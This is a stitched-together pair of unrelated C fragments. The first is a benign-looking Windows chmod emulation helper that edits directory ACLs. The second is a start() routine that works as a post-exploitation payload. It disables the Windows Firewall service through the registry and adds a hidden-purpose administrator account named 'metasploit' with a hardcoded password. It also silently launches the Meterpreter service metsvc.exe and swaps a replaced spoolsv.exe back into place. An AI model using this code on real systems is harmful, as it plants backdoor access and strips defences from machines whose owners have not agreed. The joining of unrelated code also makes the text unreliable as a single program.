static int TestplatformChmod( const char *nativePath, int pmode) { static const SECURITY_INFORMATION infoBits = OWNER_SECURITY_INFORMATION | GROUP_SECURITY_INFORMATION | DACL_SECURITY_INFORMATION; static const DWORD readOnlyMask = FILE_DELETE_CHILD | FILE_ADD_FILE | FILE_ADD_SUBDIRECTORY | FILE_WRITE_EA | FILE_APPEND_DATA | FILE_WRITE_DATA | DELETE; /* * References to security functions (only available on NT and later). */ const BOOL set_readOnly = !(pmode & 0222); BOOL acl_readOnly_found = FALSE, curAclPresent, curAclDefaulted; SID_IDENTIFIER_AUTHORITY userSidAuthority = { SECURITY_WORLD_SID_AUTHORITY }; BYTE *secDesc = 0; DWORD secDescLen, attr, newAclSize; ACL_SIZE_INFORMATION ACLSize; PACL curAcl, newAcl = 0; WORD j; SID *userSid = 0; char *userDomain = 0; int res = 0; /* * Process the chmod request. */ attr = GetFileAttributesA(nativePath); /* * nativePath not found */ if (attr == 0xffffffff) { res = -1; goto done; } /* * If nativePath is not a directory, there is no special handling. */ if (!(attr & FILE_ATTRIBUTE_DIRECTORY)) { goto done; } /* * Set the result to error, if the ACL change is successful it will be * reset to 0. */ res = -1; /* * Read the security descriptor for the directory. Note the first call * obtains the size of the security descriptor. */ if (!GetFileSecurityA(nativePath, infoBits, NULL, 0, &secDescLen)) { DWORD secDescLen2 = 0; if (GetLastError() != ERROR_INSUFFICIENT_BUFFER) { goto done; } secDesc = (BYTE *) ckalloc(secDescLen); if (!GetFileSecurityA(nativePath, infoBits, (PSECURITY_DESCRIPTOR) secDesc, secDescLen, &secDescLen2) || (secDescLen < secDescLen2)) { goto done; } } /* * Get the World SID. */ userSid = (SID *) ckalloc(GetSidLengthRequired((UCHAR) 1)); InitializeSid(userSid, &userSidAuthority, (BYTE) 1); *(GetSidSubAuthority(userSid, 0)) = SECURITY_WORLD_RID; /* * If curAclPresent == false then curAcl and curAclDefaulted not valid. */ if (!GetSecurityDescriptorDacl((PSECURITY_DESCRIPTOR) secDesc, &curAclPresent, &curAcl, &curAclDefaulted)) { goto done; } if (!curAclPresent || !curAcl) { ACLSize.AclBytesInUse = 0; ACLSize.AceCount = 0; } else if (!GetAclInformation(curAcl, &ACLSize, sizeof(ACLSize), AclSizeInformation)) { goto done; } /* * Allocate memory for the new ACL. */ newAclSize = ACLSize.AclBytesInUse + sizeof(ACCESS_DENIED_ACE) + GetLengthSid(userSid) - sizeof(DWORD); newAcl = (ACL *) ckalloc(newAclSize); /* * Initialize the new ACL. */ if (!InitializeAcl(newAcl, newAclSize, ACL_REVISION)) { goto done; } /* * Add denied to make readonly, this will be known as a "read-only tag". */ if (set_readOnly && !AddAccessDeniedAce(newAcl, ACL_REVISION, readOnlyMask, userSid)) { goto done; } acl_readOnly_found = FALSE; for (j = 0; j < ACLSize.AceCount; j++) { LPVOID pACE2; ACE_HEADER *phACE2; if (!GetAce(curAcl, j, &pACE2)) { goto done; } phACE2 = (ACE_HEADER *) pACE2; /* * Do NOT propagate inherited ACEs. */ if (phACE2->AceFlags & INHERITED_ACE) { continue; } /* * Skip the "read-only tag" restriction (either added above, or it is * being removed). */ if (phACE2->AceType == ACCESS_DENIED_ACE_TYPE) { ACCESS_DENIED_ACE *pACEd = (ACCESS_DENIED_ACE *) phACE2; if (pACEd->Mask == readOnlyMask && EqualSid(userSid, (PSID) &pACEd->SidStart)) { acl_readOnly_found = TRUE; continue; } } /* * Copy the current ACE from the old to the new ACL. */ if (!AddAce(newAcl, ACL_REVISION, MAXDWORD, (PACL *) pACE2, ((PACE_HEADER) pACE2)->AceSize)) { goto done; } } /* * Apply the new ACL. */ if (set_readOnly == acl_readOnly_found || SetNamedSecurityInfoA( (LPSTR) nativePath, SE_FILE_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, newAcl, NULL) == ERROR_SUCCESS) { res = 0; } done: if (secDesc) { ckfree((char *) secDesc); } if (newAcl) { ckfree((char *) newAcl); } if (userSid) { ckfree((char *) userSid); } if (userDomain) { ckfree((char *) userDomain); } if (res != 0) { return res; } /* * Run normal chmod command. */ return chmod(nativePath, pmode); }
void start(){ //fix wow32-64 fsredir PVOID OldValue; Wow64DisableWow64FsRedirectionFunc disableWow = (Wow64DisableWow64FsRedirectionFunc)GetProcAddress( GetModuleHandleA("kernel32"),"Wow64DisableWow64FsRedirection"); if( disableWow ) disableWow(&OldValue); char windowsPath[MAX_PATH]; GetWindowsDirectoryA(windowsPath,MAX_PATH); SetCurrentDirectoryA(windowsPath); //turn off fw HKEY mkey; DWORD four = 4; RegOpenKeyExA(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\MpsSvc", 0,KEY_SET_VALUE|KEY_WOW64_64KEY,&mkey); RegSetValueExA(mkey,"Start",0,REG_DWORD,(PBYTE)&four,sizeof(DWORD)); RegCloseKey(mkey); //add user USER_INFO_1 userinfo; userinfo.usri1_name = L"metasploit"; userinfo.usri1_password = L"p@SSw0rd!123456"; userinfo.usri1_priv = USER_PRIV_USER; userinfo.usri1_home_dir = NULL; userinfo.usri1_comment = L""; userinfo.usri1_flags = UF_SCRIPT | UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD; userinfo.usri1_script_path = NULL; DWORD res = NetUserAdd(NULL,1,(PBYTE)&userinfo,NULL); if(res == NERR_Success){ LOCALGROUP_MEMBERS_INFO_3 lgmi3; lgmi3.lgrmi3_domainandname = userinfo.usri1_name; NetLocalGroupAddMembers(NULL,L"Administrators",3,(PBYTE)&lgmi3,1); } //start metsvc STARTUPINFOA strt; PROCESS_INFORMATION proci; for(int i = 0; i < sizeof(strt); i++) ((char*)&strt)[i]=0; for(int i = 0; i < sizeof(proci); i++) ((char*)&proci)[i]=0; if( disableWow )//if 64 bit CreateProcessA("SysWOW64\\metsvc.exe","metsvc.exe install-service",NULL, NULL,FALSE,CREATE_NO_WINDOW,NULL,NULL,&strt,&proci); else CreateProcessA("System32\\metsvc.exe","metsvc.exe install-service",NULL, NULL,FALSE,CREATE_NO_WINDOW,NULL,NULL,&strt,&proci); //permissions, owner? DWORD sidSize = SECURITY_MAX_SID_SIZE; PSID ownersid = LocalAlloc(LMEM_FIXED,sidSize); CreateWellKnownSid(WinLocalSystemSid, NULL, ownersid, &sidSize); SetNamedSecurityInfoA("System32\\spoolsv.exe",SE_FILE_OBJECT,OWNER_SECURITY_INFORMATION,ownersid,NULL,NULL,NULL); SetNamedSecurityInfoA("System32\\spoolsv.bak.exe",SE_FILE_OBJECT,OWNER_SECURITY_INFORMATION,ownersid,NULL,NULL,NULL); //copy file back while(MoveFileA("System32\\spoolsv.bak.exe","System32\\spoolsv.exe") == 0){ DeleteFileA("System32\\spoolsv.exe"); Sleep(100); } //This can be added so fw disable takes effect immediately and this process exits /*/reboot HANDLE tokenh; OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&tokenh); TOKEN_PRIVILEGES tkp, otkp; DWORD oldsize; tkp.PrivilegeCount = 1; LookupPrivilegeValueA(NULL,"SeShutdownPrivilege",&(tkp.Privileges[0].Luid)); tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; AdjustTokenPrivileges(tokenh,FALSE,&tkp,sizeof(tkp),&otkp,&oldsize); ExitWindowsEx(EWX_REBOOT | EWX_FORCE, SHTDN_REASON_MAJOR_OPERATINGSYSTEM | SHTDN_REASON_MINOR_UPGRADE | SHTDN_REASON_FLAG_PLANNED);//*/ }